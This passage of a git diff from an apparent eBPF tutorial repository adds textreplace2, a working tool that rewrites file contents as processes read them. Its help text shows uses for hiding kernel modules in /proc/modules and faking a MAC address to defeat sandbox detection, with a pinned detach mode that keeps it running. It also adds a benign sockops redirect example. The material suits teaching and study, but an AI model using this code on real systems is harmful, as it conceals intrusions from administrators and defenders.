target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int newline_counter = 0; + unsigned int match_counter = 0; + + char name[TEXT_LEN_MAX+1]; + unsigned int j = 0; + char old = 0; + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + + const unsigned int name_len = pFind->text_len; + if (name_len < 0) { + return 0; + } + if (name_len > TEXT_LEN_MAX) { + return 0; + } + // Go over every possibly location + // and check if it really does match our text + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + newline_counter = i; + pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + bpf_probe_read_user(&name, TEXT_LEN_MAX, (char*)name_addr); + for (j = 0; j < TEXT_LEN_MAX; j++) { + if (name[j] != pFind->text[j]) { + break; + } + } + // for newer kernels, maybe use bpf_strncmp + // if (bpf_strncmp(pFind->text, TEXT_LEN_MAX, name) == 0) { + if (j >= name_len) { + // *********** + // We've found out text! + // Add location to map to be overwritten + // *********** + bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY); + match_counter++; + } + bpf_map_delete_elem(&map_name_addrs, &newline_counter); + } + + // If we found at least one match, jump into program to overwrite text + if (match_counter > 0) { + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + return 0; +} + + +SEC("fexit/__x64_sys_read") +int BPF_PROG(overwrite_addresses, struct pt_regs *regs, long ret) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + int pid = pid_tgid >> 32; + long unsigned int* pName_addr = 0; + long unsigned int name_addr = 0; + unsigned int match_counter = 0; + + int index = PROG_01; + struct tr_text *pReplace = bpf_map_lookup_elem(&map_text, &index); + if (pReplace == NULL) { + return 0; + } + + // Loop over every address to replace text into + for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) { + match_counter = i; + pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter); + if (pName_addr == 0) { + break; + } + name_addr = *pName_addr; + if (name_addr == 0) { + break; + } + // Attempt to overwrite data with out replace string (minus the end null bytes) + // We have to do it this long way to deal with the variable text_len + char data[TEXT_LEN_MAX]; + bpf_probe_read_user(&data, TEXT_LEN_MAX, (void*)name_addr); + for (unsigned int j = 0; j < TEXT_LEN_MAX; j++) { + if (j >= pReplace->text_len) { + break; + } + data[j] = pReplace->text[j]; + } + long ret = bpf_probe_write_user((void*)name_addr, (void*)data, TEXT_LEN_MAX); + + // Send event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + int index = PROG_00; + struct tr_text *pFind = bpf_map_lookup_elem(&map_text, &index); + if (pFind == NULL) { + return 0; + } + bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, pFind->text); + + // Clean up map now we're done + bpf_map_delete_elem(&map_to_replace_addrs, &match_counter); + } + + return 0; +} diff --git a/28-detach/textreplace2.c b/28-detach/textreplace2.c new file mode 100644 index 0000000..a59724b --- /dev/null +++ b/28-detach/textreplace2.c @@ -0,0 +1,505 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include +#include +#include +#include "textreplace2.skel.h" +#include "textreplace2.h" + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + +// Setup Argument stuff +static struct env { + char filename[FILENAME_LEN_MAX]; + char input[FILENAME_LEN_MAX]; + char replace[FILENAME_LEN_MAX]; + bool detatch; + int target_ppid; +} env; + +const char *argp_program_version = "textreplace2 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"Text Replace\n" +"\n" +"Replaces text in a file.\n" +"To pass in newlines use \%'\\n' e.g.:\n" +" ./textreplace2 -f /proc/modules -i ppdev -r $'aaaa\\n'" +"\n" +"USAGE: ./textreplace2 -f filename -i input -r output [-t 1111] [-d]\n" +"EXAMPLES:\n" +"Hide kernel module:\n" +" ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd'\n" +"Fake Ethernet adapter (used in sandbox detection): \n" +" ./textreplace2 -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' \n" +"Run detached (userspace program can exit):\n" +" ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' --detach\n" +"To stop detached program:\n" +" sudo rm -rf /sys/fs/bpf/textreplace\n" +""; + +static const struct argp_option opts[] = { + { "filename", 'f', "FILENAME", 0, "Path to file to replace text in" }, + { "input", 'i', "INPUT", 0, "Text to be replaced in file, max 20 chars" }, + { "replace", 'r', "REPLACE", 0, "Text to replace with in file, must be same size as -t" }, + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + { "detatch", 'd', NULL, 0, "Pin programs to filesystem and exit usermode process" }, + {}, +}; + +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 'i': + if (strlen(arg) >= TEXT_LEN_MAX) { + fprintf(stderr, "Text must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.input, arg, sizeof(env.input)); + break; + case 'd': + env.detatch = true; + break; + case 'r': + if (strlen(arg) >= TEXT_LEN_MAX) { + fprintf(stderr, "Text must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.replace, arg, sizeof(env.replace)); + break; + case 'f': + if (strlen(arg) >= FILENAME_LEN_MAX) { + fprintf(stderr, "Filename must be less than %d characters\n", FILENAME_LEN_MAX); + argp_usage(state); + } + strncpy(env.filename, arg, sizeof(env.filename)); + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Replaced text in PID %d (%s)\n", e->pid, e->comm); + else + printf("Failed to replace text in PID %d (%s)\n", e->pid, e->comm); + return 0; +} + +static const char* base_folder = "/sys/fs/bpf/textreplace"; + +int rmtree(const char *path) +{ + size_t path_len; + char *full_path; + DIR *dir; + struct stat stat_path, stat_entry; + struct dirent *entry; + + // stat for the path + stat(path, &stat_path); + + // if path does not exists or is not dir - exit with status -1 + if (S_ISDIR(stat_path.st_mode) == 0) { + // ignore + return 0; + } + + // if not possible to read the directory for this user + if ((dir = opendir(path)) == NULL) { + fprintf(stderr, "%s: %s\n", "Can`t open directory", path); + return 1; + } + + // the length of the path + path_len = strlen(path); + + // iteration through entries in the directory + while ((entry = readdir(dir)) != NULL) { + // skip entries "." and ".." + if (!strcmp(entry->d_name, ".") || !strcmp(entry->d_name, "..")) + continue; + + // determinate a full path of an entry + full_path = calloc(path_len + strlen(entry->d_name) + 1, sizeof(char)); + strcpy(full_path, path); + strcat(full_path, "/"); + strcat(full_path, entry->d_name); + + // stat for the entry + stat(full_path, &stat_entry); + + // recursively remove a nested directory + if (S_ISDIR(stat_entry.st_mode) != 0) { + rmtree(full_path); + continue; + } + + // remove a file object + if (unlink(full_path)) { + printf("Can`t remove a file: %s\n", full_path); + return 1; + } + free(full_path); + } + + // remove the devastated directory and close the object of it + if (rmdir(path)) { + printf("Can`t remove a directory: %s\n", path); + return 1; + } + + closedir(dir); + return 0; +} + + +int cleanup_pins() { + return rmtree(base_folder); +} + +int pin_program(struct bpf_program *prog, const char* path) +{ + int err; + err = bpf_program__pin(prog, path); + if (err) { + fprintf(stdout, "could not pin prog %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_map(struct bpf_map *map, const char* path) +{ + int err; + err = bpf_map__pin(map, path); + if (err) { + fprintf(stdout, "could not pin map %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_link(struct bpf_link *link, const char* path) +{ + int err; + err = bpf_link__pin(link, path); + if (err) { + fprintf(stdout, "could not pin link %s: %d\n", path, err); + return err; + } + return err; +} + +static int pin_stuff(struct textreplace2_bpf *skel) { + /* + Sorry in advance for not this function being quite garbage, + but I tried to keep the code simple to make it easy to read + and modify + */ + int err; + int counter = 0; + struct bpf_program *prog; + struct bpf_map *map; + char pin_path[100]; + + // Pin Maps + bpf_object__for_each_map(map, skel->obj) { + sprintf(pin_path, "%s/map_%02d", base_folder, counter++); + err = pin_map(map, pin_path); + if (err) { return err; } + } + + // Pin Programs + counter = 0; + bpf_object__for_each_program(prog, skel->obj) { + sprintf(pin_path, "%s/prog_%02d", base_folder, counter++); + err = pin_program(prog, pin_path); + if (err) { return err; } + } + + // Pin Links. There's not for_each for links + // so do it manually in a gross way + counter = 0; + memset(pin_path, '\x00', sizeof(pin_path)); + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_close_exit, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_openat_enter, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_openat_exit, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.handle_read_enter, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.find_possible_addrs, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.check_possible_addresses, pin_path); + if (err) { return err; } + sprintf(pin_path, "%s/link_%02d", base_folder, counter++); + err = pin_link(skel->links.overwrite_addresses, pin_path); + if (err) { return err; } + + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct textreplace2_bpf *skel; + int err; + int index; + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + if (env.filename[0] == '\x00' || env.input[0] == '\x00' || env.replace[0] == '\x00') { + printf("ERROR: filename, input, and replace all requried, see %s --help\n", argv[0]); + exit(1); + } + if (strlen(env.input) != strlen(env.replace)) { + printf("ERROR: input and replace text must be the same length\n"); + exit(1); + } + + // Do common setup + if (!setup()) { + exit(1); + } + + if (env.detatch) { + // Check bpf filesystem is mounted + if (access("/sys/fs/bpf", F_OK) != 0) { + fprintf(stderr, "Make sure bpf filesystem mounted by running:\n"); + fprintf(stderr, " sudo mount bpffs -t bpf /sys/fs/bpf\n"); + return 1; + } + if (cleanup_pins()) + return 1; + } + + // Open BPF application + skel = textreplace2_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Verify and load program + err = textreplace2_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + struct tr_file file; + strncpy(file.filename, env.filename, sizeof(file.filename)); + index = PROG_00; + file.filename_len = strlen(env.filename); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_filename), + &index, + &file, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add filename to map? %s\n", strerror(errno)); + goto cleanup; + } + + struct tr_text text; + strncpy(text.text, env.input, sizeof(text.text)); + index = PROG_00; + text.text_len = strlen(env.input); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_text), + &index, + &text, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add text input to map? %s\n", strerror(errno)); + goto cleanup; + } + strncpy(text.text, env.replace, sizeof(text.text)); + index = PROG_01; + text.text_len = strlen(env.replace); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_text), + &index, + &text, + BPF_ANY + ); + if (err == -1) { + printf("Failed to add text replace to map? %s\n", strerror(errno)); + goto cleanup; + } + + // Add program to map so we can call it later + index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.check_possible_addresses); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (err == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.overwrite_addresses); + err = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (err == -1) { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = textreplace2_bpf__attach(skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + if (env.detatch) { + err = pin_stuff(skel); + if (err) { + fprintf(stderr, "Failed to pin stuff\n"); + goto cleanup; + } + + printf("----------------------------------\n"); + printf("----------------------------------\n"); + printf("Successfully started!\n"); + printf("Please run `sudo cat /sys/kernel/debug/tracing/trace_pipe` " + "to see output of the BPF programs.\n"); + printf("Files are pinned in folder %s\n", base_folder); + printf("To stop programs, run 'sudo rm -r%s'\n", base_folder); + } + else { + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + } + +cleanup: + textreplace2_bpf__destroy(skel); + if (err != 0) { + cleanup_pins(); + } + return -err; +} diff --git a/28-detach/textreplace2.h b/28-detach/textreplace2.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/28-detach/textreplace2.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/29-sockops/.gitignore b/29-sockops/.gitignore new file mode 100644 index 0000000..024ee36 --- /dev/null +++ b/29-sockops/.gitignore @@ -0,0 +1,8 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +ecc diff --git a/29-sockops/bpf_redir.c b/29-sockops/bpf_redir.c new file mode 100644 index 0000000..654587b --- /dev/null +++ b/29-sockops/bpf_redir.c @@ -0,0 +1,27 @@ +#include +#include + +#include "bpf_sockops.h" + +__section("sk_msg") +int bpf_redir(struct sk_msg_md *msg) +{ + __u64 flags = BPF_F_INGRESS; + struct sock_key key = {}; + + sk_msg_extract4_key(msg, &key); + // See whether the source or destination IP is local host + if (key.sip4 == 16777343 || key.dip4 == 16777343) { + // See whether the source or destination port is 10000 + if (key.sport == 4135 || key.dport == 4135) { + int len1 = (__u64)msg->data_end - (__u64)msg->data; + printk("<<< redir_proxy port %d --> %d (%d)\n", key.sport, key.dport, len1); + msg_redirect_hash(msg, &sock_ops_map, &key, flags); + } + } + + return SK_PASS; +} + +BPF_LICENSE("GPL"); +int _version __section("version") = 1; diff --git a/29-sockops/bpf_sockops.c b/29-sockops/bpf_sockops.c new file mode 100644 index 0000000..b19929b --- /dev/null +++ b/29-sockops/bpf_sockops.c @@ -0,0 +1,52 @@ +#include +#include +#include + +#include "bpf_sockops.h" + +static inline void bpf_sock_ops_ipv4(struct bpf_sock_ops *skops) +{ + struct sock_key key = {}; + sk_extract4_key(skops, &key); + if (key.dip4 == 16777343 || key.sip4 == 16777343 ) { + if (key.dport == 4135 || key.sport == 4135) { + int ret = sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); + printk("<<< ipv4 op = %d, port %d --> %d\n", skops->op, key.sport, key.dport); + if (ret != 0) + printk("*** FAILED %d ***\n", ret); + } + } +} + +static inline void bpf_sock_ops_ipv6(struct bpf_sock_ops *skops) +{ + if (skops->remote_ip4) + bpf_sock_ops_ipv4(skops); +} + + +__section("sockops") +int bpf_sockmap(struct bpf_sock_ops *skops) +{ + __u32 family, op; + + family = skops->family; + op = skops->op; + + printk("<<< op %d, port = %d --> %d\n", op, skops->local_port, skops->remote_port); + switch (op) { + case BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB: + case BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB: + if (family == AF_INET6) + bpf_sock_ops_ipv6(skops); + else if (family == AF_INET) + bpf_sock_ops_ipv4(skops); + break; + default: + break; + } + return 0; +} + +BPF_LICENSE("GPL"); +int _version __section("version") = 1; diff --git a/29-sockops/bpf_sockops.h b/29-sockops/bpf_sockops.h new file mode 100644 index 0000000..c625da2 --- /dev/null +++ b/29-sockops/bpf_sockops.h @@ -0,0 +1,168 @@ +#include +#include + +#if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ +# define __bpf_ntohs(x) __builtin_bswap16(x) +# define __bpf_htons(x) __builtin_bswap16(x) +# define __bpf_constant_ntohs(x) ___constant_swab16(x) +# define __bpf_constant_htons(x) ___constant_swab16(x) +# define __bpf_ntohl(x) __builtin_bswap32(x) +# define __bpf_htonl(x) __builtin_bswap32(x) +# define __bpf_constant_ntohl(x) ___constant_swab32(x) +# define __bpf_constant_htonl(x) ___constant_swab32(x) +#elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ +# define __bpf_ntohs(x) (x) +# define __bpf_htons(x) (x) +# define __bpf_constant_ntohs(x) (x) +# define __bpf_constant_htons(x) (x) +# define __bpf_ntohl(x) (x) +# define __bpf_htonl(x) (x) +# define __bpf_constant_ntohl(x) (x) +# define __bpf_constant_htonl(x) (x) +#else +# error "Fix your compiler's __BYTE_ORDER__?!" +#endif + +#define bpf_htons(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_htons(x) : __bpf_htons(x)) +#define bpf_ntohs(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_ntohs(x) : __bpf_ntohs(x)) +#define bpf_htonl(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_htonl(x) : __bpf_htonl(x)) +#define bpf_ntohl(x) \ + (__builtin_constant_p(x) ? \ + __bpf_constant_ntohl(x) : __bpf_ntohl(x)) + +/** Section helper macros. */ + +#ifndef __section +# define __section(NAME) \ + __attribute__((section(NAME), used)) +#endif + +#ifndef __section_tail +# define __section_tail(ID, KEY) \ + __section(__stringify(ID) "/" __stringify(KEY)) +#endif + +#ifndef __section_cls_entry +# define __section_cls_entry \ + __section("classifier") +#endif + +#ifndef __section_act_entry +# define __section_act_entry \ + __section("action") +#endif + +#ifndef __section_license +# define __section_license \ + __section("license") +#endif + +#ifndef __section_maps +# define __section_maps \ + __section("maps") +#endif + +/** Declaration helper macros. */ + +#ifndef BPF_LICENSE +# define BPF_LICENSE(NAME) \ + char ____license[] __section_license = NAME +#endif + +#ifndef BPF_FUNC +# define BPF_FUNC(NAME, ...) \ + (*NAME)(__VA_ARGS__) = (void *)BPF_FUNC_##NAME +#endif + +static int BPF_FUNC(sock_hash_update, struct bpf_sock_ops *skops, void *map, void *key, uint64_t flags); +static int BPF_FUNC(msg_redirect_hash, struct sk_msg_md *md, void *map, void *key, uint64_t flags); +static void BPF_FUNC(trace_printk, const char *fmt, int fmt_size, ...); + +#ifndef printk +# define printk(fmt, ...) \ + ({ \ + char ____fmt[] = fmt; \ + trace_printk(____fmt, sizeof(____fmt), ##__VA_ARGS__); \ + }) +#endif + + +struct bpf_map_def { + __u32 type; + __u32 key_size; + __u32 value_size; + __u32 max_entries; + __u32 map_flags; +}; + +union v6addr { + struct { + __u32 p1; + __u32 p2; + __u32 p3; + __u32 p4; + }; + __u8 addr[16]; +}; + +struct sock_key { + union { + struct { + __u32 sip4; + __u32 pad1; + __u32 pad2; + __u32 pad3; + }; + union v6addr sip6; + }; + union { + struct { + __u32 dip4; + __u32 pad4; + __u32 pad5; + __u32 pad6; + }; + union v6addr dip6; + }; + __u8 family; + __u8 pad7; + __u16 pad8; + __u32 sport; + __u32 dport; +} __attribute__((packed)); + +struct bpf_map_def __section_maps sock_ops_map = { + .type = BPF_MAP_TYPE_SOCKHASH, + .key_size = sizeof(struct sock_key), + .value_size = sizeof(int), + .max_entries = 65535, + .map_flags = 0, +}; + +static inline void sk_extract4_key(struct bpf_sock_ops *ops, + struct sock_key *key) +{ + key->dip4 = ops->remote_ip4; + key->sip4 = ops->local_ip4; + key->family = 1; + + key->sport = (bpf_htonl(ops->local_port) >> 16); + key->dport = ops->remote_port >> 16; +} + +static inline void sk_msg_extract4_key(struct sk_msg_md *msg, + struct sock_key *key) +{ + key->sip4 = msg->remote_ip4; + key->dip4 = msg->local_ip4; + key->family = 1; + + key->dport = (bpf_htonl(msg->local_port) >> 16); + key->sport = msg->remote_port >> 16; +} diff --git a/29-sockops/envoy/Dockerfile b/29-sockops/envoy/Dockerfile new file mode 100644 index 0000000..1f1da7f --- /dev/null +++ b/29-sockops/envoy/Dockerfile @@ -0,0 +1,3 @@ +FROM envoyproxy/envoy:latest +COPY envoy.yaml /etc/envoy/envoy.yaml +EXPOSE 9901 diff --git a/29-sockops/envoy/envoy.yaml b/29-sockops/envoy/envoy.yaml new file mode 100644 index 0000000..6225a4f --- /dev/null +++ b/29-sockops/envoy/envoy.yaml @@ -0,0 +1,30 @@ +admin: + access_log_path: /tmp/admin_access.log + address: + socket_address: + protocol: TCP + address: 0.0.0.0 + port_value: 9901 +static_resources: + listeners: + - name: iperf3-listener + address: + socket_address: + protocol: TCP + address: 0.0.0.0 + port_value: 10000 + filter_chains: + - filters: + - name: envoy.tcp_proxy + config: + stat_prefix: iperf3-listener + cluster: iperf3_server + clusters: + - name: iperf3_server + connect_timeout: 1.0s + type: static + lb_policy: ROUND_ROBIN + hosts: + - socket_address: + address: 127.0.0.1 + port_value: 5201 diff --git a/29-sockops/index.html b/29-sockops/index.html new file mode 100644 index 0000000..9300922 --- /dev/null +++ b/29-sockops/index.html @@ -0,0 +1,245 @@ + + + + + + 使用 sockops 加速网络请求转发 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    eBPF sockops 示例

    +

    利用 eBPF 的 sockops 进行性能优化

    +

    网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 bpf_msg_redirect_hash 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。

    +

    这里 sock_map 是记录 socket 规则的关键部分,即根据当前的数据包信息,从 sock_map 中挑选一个存在的 socket 连接来转发请求。所以需要先在 sockops 的 hook 处或者其它地方,将 socket 信息保存到 sock_map,并提供一个规则 (一般为四元组) 根据 key 查找到 socket。

    +

    Merbridge 项目就是这样实现了用 eBPF 代替 iptables 为 Istio 进行加速。在使用 Merbridge (eBPF) 优化之后,出入口流量会直接跳过很多内核模块,明显提高性能,如下图所示:

    +

    merbridge

    +

    运行样例

    +

    此示例程序从发送者的套接字(出口)重定向流量至接收者的套接字(入口),跳过 TCP/IP 内核网络栈。在这个示例中,我们假定发送者和接收者都在同一台机器上运行。

    +

    编译 eBPF 程序

    +
    # Compile the bpf_sockops program
    +clang -O2 -g  -Wall -target bpf  -c bpf_sockops.c -o bpf_sockops.o
    +clang -O2 -g  -Wall -target bpf  -c bpf_redir.c -o bpf_redir.o
    +
    +

    加载 eBPF 程序

    +
    sudo ./load.sh
    +
    +

    您可以使用 bpftool utility 检查这两个 eBPF 程序是否已经加载。

    +
    $ sudo bpftool prog show
    +63: sock_ops  name bpf_sockmap  tag 275467be1d69253d  gpl
    + loaded_at 2019-01-24T13:07:17+0200  uid 0
    + xlated 1232B  jited 750B  memlock 4096B  map_ids 58
    +64: sk_msg  name bpf_redir  tag bc78074aa9dd96f4  gpl
    + loaded_at 2019-01-24T13:07:17+0200  uid 0
    + xlated 304B  jited 233B  memlock 4096B  map_ids 58
    +
    +

    运行 iperf3 服务器

    +
    iperf3 -s -p 10000
    +
    +

    运行 iperf3 客户端

    +
    iperf3 -c 127.0.0.1 -t 10 -l 64k -p 10000
    +
    +

    收集追踪

    +
    $ ./trace.sh
    +iperf3-9516  [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135
    +iperf3-9516  [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583
    +iperf3-9516  [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135
    +iperf3-9516  [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095
    +
    +

    你应该可以看到 4 个用于套接字建立的事件。如果你没有看到任何事件,那么 eBPF 程序可能没有正确地附加上。

    +

    卸载 eBPF 程序

    +
    sudo ./unload.sh
    +
    +

    参考资料

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/29-sockops/load.sh b/29-sockops/load.sh new file mode 100755 index 0000000..df2073b --- /dev/null +++ b/29-sockops/load.sh @@ -0,0 +1,20 @@ +#!/bin/bash +set -x +set -e + +# Mount bpf filesystem +sudo mount -t bpf bpf /sys/fs/bpf/ + +# Load the bpf_sockops program +sudo bpftool prog load bpf_sockops.o "/sys/fs/bpf/bpf_sockop" +sudo bpftool cgroup attach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/bpf_sockop" + +MAP_ID=$(sudo bpftool prog show pinned "/sys/fs/bpf/bpf_sockop" | grep -o -E 'map_ids [0-9]+' | awk '{print $2}') +sudo bpftool map pin id $MAP_ID "/sys/fs/bpf/sock_ops_map" + +# Load the bpf_redir program +if [ -z $1 ] +then + sudo bpftool prog load bpf_redir.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" + sudo bpftool prog attach pinned "/sys/fs/bpf/bpf_redir" msg_verdict pinned "/sys/fs/bpf/sock_ops_map" +fi diff --git a/29-sockops/merbridge.png b/29-sockops/merbridge.png new file mode 100644 index 0000000..f122315 Binary files /dev/null and b/29-sockops/merbridge.png differ diff --git a/29-sockops/trace.sh b/29-sockops/trace.sh new file mode 100755 index 0000000..4589b36 --- /dev/null +++ b/29-sockops/trace.sh @@ -0,0 +1,2 @@ +#!/bin/bash +sudo cat /sys/kernel/debug/tracing/trace_pipe diff --git a/29-sockops/unload.sh b/29-sockops/unload.sh new file mode 100755 index 0000000..32d8659 --- /dev/null +++ b/29-sockops/unload.sh @@ -0,0 +1,13 @@ +#!/bin/bash +set -x + +# UnLoad the bpf_redir program +sudo bpftool prog detach pinned "/sys/fs/bpf/bpf_redir" msg_verdict pinned "/sys/fs/bpf/sock_ops_map" +sudo rm "/sys/fs/bpf/bpf_redir" + +# UnLoad the bpf_sockops program +sudo bpftool cgroup detach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/bpf_sockop" +sudo rm "/sys/fs/bpf/bpf_sockop" + +# Delete the map +sudo rm "/sys/fs/bpf/sock_ops_map" diff --git a/3-fentry-unlink/index.html b/3-fentry-unlink/index.html index 48ddae7..f0ed52d 100644 --- a/3-fentry-unlink/index.html +++ b/3-fentry-unlink/index.html @@ -83,7 +83,7 @@ @@ -209,7 +209,7 @@ rm test_file2

    总结

